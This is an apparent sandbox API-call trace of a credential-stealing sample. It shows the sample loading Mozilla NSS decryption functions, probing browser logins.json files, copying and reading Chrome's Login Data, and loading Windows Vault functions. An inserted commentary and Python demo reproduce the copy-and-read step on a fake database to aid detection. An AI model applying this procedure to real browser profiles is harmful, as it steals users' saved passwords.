File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-localization-l1-2-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-localization-l1-2-0.dll, size = 20792 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-memory-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-memory-l1-1-0.dll, size = 18744 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-namedpipe-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-namedpipe-l1-1-0.dll, size = 18232 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processenvironment-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processenvironment-l1-1-0.dll, size = 19248 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-0.dll, size = 19392 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-1.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-1.dll, size = 18744 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-profile-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-profile-l1-1-0.dll, size = 17712 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-rtlsupport-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-rtlsupport-l1-1-0.dll, size = 17720 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-string-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-string-l1-1-0.dll, size = 18232 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-1-0.dll, size = 20280 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-2-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-2-0.dll, size = 18744 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-sysinfo-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-sysinfo-l1-1-0.dll, size = 19248 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-timezone-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-timezone-l1-1-0.dll, size = 18224 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-util-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-util-l1-1-0.dll, size = 18232 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-conio-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-conio-l1-1-0.dll, size = 19256 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-convert-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-convert-l1-1-0.dll, size = 22328 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-environment-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-environment-l1-1-0.dll, size = 18736 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-filesystem-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-filesystem-l1-1-0.dll, size = 20280 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-heap-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-heap-l1-1-0.dll, size = 19256 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-locale-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-locale-l1-1-0.dll, size = 18744 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-math-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-multibyte-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-multibyte-l1-1-0.dll, size = 26424 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-private-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-process-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-runtime-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-runtime-l1-1-0.dll, size = 22840 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-stdio-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-string-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-string-l1-1-0.dll, size = 23488 True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-time-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-utility-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/freebl3.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/mozglue.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/msvcp140.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/nss3.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/nssdbm3.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/softokn3.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/ucrtbase.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/vcruntime140.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\nss3.dll, type = file_attributes True 1
Environment Get Environment String name = PATH True 1
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Environment Set Environment String name = PATH, value = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Module Load module_name = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\nss3.dll, base_address = 0x73a90000 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitOnceExecuteOnce, address_out = 0x76c4d627 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x76c4eee0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleEx, address_out = 0x76c4c78f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandle, address_out = 0x76c5cbfc True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimePreciseAsFileTime, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77168456 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WakeConditionVariable, address_out = 0x771d7de4 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x7719409d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x76cb4b32 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeSRWLock, address_out = 0x77168456 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AcquireSRWLockExclusive, address_out = 0x771629f1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TryAcquireSRWLockExclusive, address_out = 0x77174892 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseSRWLockExclusive, address_out = 0x771629ab True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SleepConditionVariableSRW, address_out = 0x76cb4b74 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWork, address_out = 0x76c4ee45 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SubmitThreadpoolWork, address_out = 0x771a8491 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWork, address_out = 0x7719d8e2 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x76cb46b1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Module Get Handle module_name = c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll, base_address = 0x74650000 True 1
Module Get Address module_name = c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll, function = InitializeConditionVariable, address_out = 0x77168456 True 1
Module Get Address module_name = c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll, function = SleepConditionVariableCS, address_out = 0x76cb4b32 True 1
Module Get Address module_name = c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll, function = WakeAllConditionVariable, address_out = 0x7719409d True 1
System Get Time type = Performance Ctr, time = 19042016873 True 1
System Get Time type = Performance Ctr, time = 19042027985 True 1
System Get Time type = Performance Ctr, time = 19042039154 True 1
System Get Time type = Performance Ctr, time = 19042050141 True 1
System Get Time type = Performance Ctr, time = 19042060963 True 1
System Get Time type = Performance Ctr, time = 19042071525 True 1
System Get Time type = Performance Ctr, time = 19042082397 True 1
System Get Time type = Performance Ctr, time = 19042093322 True 1
System Get Time type = Performance Ctr, time = 19042104141 True 1
System Get Time type = Performance Ctr, time = 19042114720 True 1
System Get Time type = Performance Ctr, time = 19042125440 True 1
System Get Time type = Performance Ctr, time = 19042135778 True 1
System Get Time type = Performance Ctr, time = 19042146153 True 1
System Get Time type = Performance Ctr, time = 19042156717 True 1
System Get Time type = Performance Ctr, time = 19042167498 True 1
System Get Time type = Performance Ctr, time = 19042178398 True 1
System Get Time type = Performance Ctr, time = 19042189328 True 1
System Get Time type = Performance Ctr, time = 19042199927 True 1
System Get Time type = Performance Ctr, time = 19042210637 True 1
System Get Time type = Performance Ctr, time = 19042221395 True 1
System Get Time type = Performance Ctr, time = 19042232255 True 1
System Get Time type = Ticks, time = 126610 True 1
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = sqlite3_open, address_out = 0x73ae49c9 True 1
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = sqlite3_close, address_out = 0x73ae3341 True 1
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = sqlite3_prepare_v2, address_out = 0x73acd529 True 1
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = sqlite3_step, address_out = 0x73aacfda True 1
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = sqlite3_column_text, address_out = 0x73aad453 True 1
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = sqlite3_column_bytes, address_out = 0x73aad37e True 1
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = sqlite3_finalize, address_out = 0x73aac7d3 True 1
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = NSS_Init, address_out = 0x73b20391 True 1
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x73b448fe True 1
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = PK11_Authenticate, address_out = 0x73b2d0d8 True 1
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x73b4089d True 1
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = NSS_Shutdown, address_out = 0x73b2061c True 1
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = PK11_FreeSlot, address_out = 0x73b44370 True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\.\logins.json, type = file_attributes False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\..\logins.json, type = file_attributes False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\logins.json, type = file_attributes False 1
System Get Info type = Hardware Information True 2
Environment Get Environment String name = MALLOC_OPTIONS False 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadDescription, address_out = 0x0 False 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
File Open filename = STD_INPUT_HANDLE True 1
File Open filename = STD_OUTPUT_HANDLE True 1
File Open filename = STD_ERROR_HANDLE True 1
System Get Info type = Operating System True 1
Module Get Handle module_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, base_address = 0x400000 True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Thunderbird\Profiles\\logins.json, type = file_attributes False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Waterfox\Profiles\\logins.json, type = file_attributes False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Comodo\IceDragon\Profiles\\logins.json, type = file_attributes False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\8pecxstudios\Cyberfox\Profiles\\logins.json, type = file_attributes False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Moonchild Productions\Pale Moon\Profiles\\logins.json, type = file_attributes False 1
File Copy source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data, destination_filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp True 1
System Get Info type = Hardware Information True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp, type = file_attributes True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp, size = 100, size_out = 100 True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp-journal, type = file_attributes False 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp-wal, type = file_attributes False 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp, size = 2048, size_out = 2048 True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp-journal, type = file_attributes False 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp, size = 16, size_out = 16 True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp-wal, type = file_attributes False 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp, size = 2048, size_out = 2048 True 1
File Delete filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp True 1
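The copy, read and delete sequence above is the standard way a stealer reads a browser's SQLite store while the browser still holds the live file open. The read sizes are SQLite's own open sequence rather than anything the malware chose: the 100-byte read is the file header (magic string, page size at offset 16, change counter at offset 24), the -journal and -wal File Get Info probes are the library checking for a hot rollback journal and a write-ahead log before it touches page 1, the 2048-byte reads are page 1 at the page size recorded in the header, and the 16-byte read is the change-counter check at offset 24 that SQLite performs when it takes a shared lock. The Python below is an added example, not code from the report or from the sample. It builds a constructed stand-in for Chrome's Login Data with a reduced logins schema and fake rows, replays the same copy-to-Temp, header parse, journal and WAL check, query and delete, and classifies each password_value by its prefix (v10 for Chrome's AES-GCM scheme, a DPAPI version field for the older per-value blob) without decrypting anything. The schema subset and the row contents are assumptions made for the demonstration.

```python
import os
import shutil
import sqlite3
import struct
import tempfile

SQLITE_MAGIC = b"SQLite format 3\x00"


def parse_sqlite_header(header: bytes) -> dict:
    """Decode the fields of the 100-byte SQLite file header that the trace's reads revolve around."""
    if len(header) < 100 or header[:16] != SQLITE_MAGIC:
        raise ValueError("not an SQLite 3 database")
    page_size = struct.unpack_from(">H", header, 16)[0]
    if page_size == 1:                       # on-disk encoding of 65536
        page_size = 65536
    change_counter = struct.unpack_from(">I", header, 24)[0]   # the 16-byte read at offset 24 starts here
    return {"page_size": page_size, "change_counter": change_counter}


def classify_password_blob(blob: bytes) -> str:
    """Chrome's password_value is never plaintext: 'v10' marks AES-GCM (key in Local State, DPAPI-wrapped);
    a leading DPAPI version field (01 00 00 00) marks the older per-value DPAPI blob."""
    if blob[:3] == b"v10":
        return "aes-gcm"
    if blob[:4] == b"\x01\x00\x00\x00":
        return "dpapi"
    return "unknown"


def build_sample_login_data(path: str) -> None:
    """Constructed stand-in for Chrome's Login Data: reduced 'logins' schema, fake rows (assumption)."""
    con = sqlite3.connect(path)
    con.execute("PRAGMA page_size = 2048")  # gives the 2048-byte page reads seen in the trace
    con.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)")
    con.executemany(
        "INSERT INTO logins VALUES (?, ?, ?)",
        [
            ("https://mail.example.test/", "alice", b"v10" + b"\x00" * 12 + b"ciphertext+tag"),
            ("https://intranet.example.test/", "bob", b"\x01\x00\x00\x00" + b"\xd0\x8c\x9d\xdf" + b"rest-of-blob"),
        ],
    )
    con.commit()
    con.close()


def copy_and_dump_logins(login_data_path: str) -> dict:
    """Reproduce the trace's sequence: copy the browser DB to a temp file (the live copy is locked by
    the browser), read it there, then delete the copy."""
    fd, tmp = tempfile.mkstemp(suffix=".tmp")
    os.close(fd)
    shutil.copyfile(login_data_path, tmp)
    try:
        with open(tmp, "rb") as f:
            header = parse_sqlite_header(f.read(100))          # File Read size = 100
        # SQLite checks for a hot rollback journal and a WAL before it reads page 1;
        # those are the -journal / -wal File Get Info probes in the trace.
        journal_present = any(os.path.exists(tmp + suffix) for suffix in ("-journal", "-wal"))
        con = sqlite3.connect(tmp)                              # page 1 read: File Read size = page_size
        rows = [
            {"url": url, "user": user, "scheme": classify_password_blob(blob)}
            for url, user, blob in con.execute(
                "SELECT origin_url, username_value, password_value FROM logins ORDER BY rowid"
            )
        ]
        con.close()
    finally:
        os.remove(tmp)                                          # File Delete of the temp copy
    return {"header": header, "journal_present": journal_present, "rows": rows}


def demo() -> dict:
    """Build the constructed database in a scratch directory and run the dump against it."""
    workdir = tempfile.mkdtemp()
    src = os.path.join(workdir, "Login Data")
    build_sample_login_data(src)
    try:
        return copy_and_dump_logins(src)
    finally:
        shutil.rmtree(workdir, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

Run it with no arguments; it never touches a real profile. The point for detection is that the copy itself is the observable: a non-browser process copying Login Data into Temp and removing the copy seconds later is a stronger signal than any of the individual SQLite reads.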
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x755fe599 True 1
Module Load module_name = vaultcli.dll, base_address = 0x73500000 True 1
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultOpenVault, address_out = 0x735026a9 True 1
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultEnumerateItems, address_out = 0x73503099 True 1
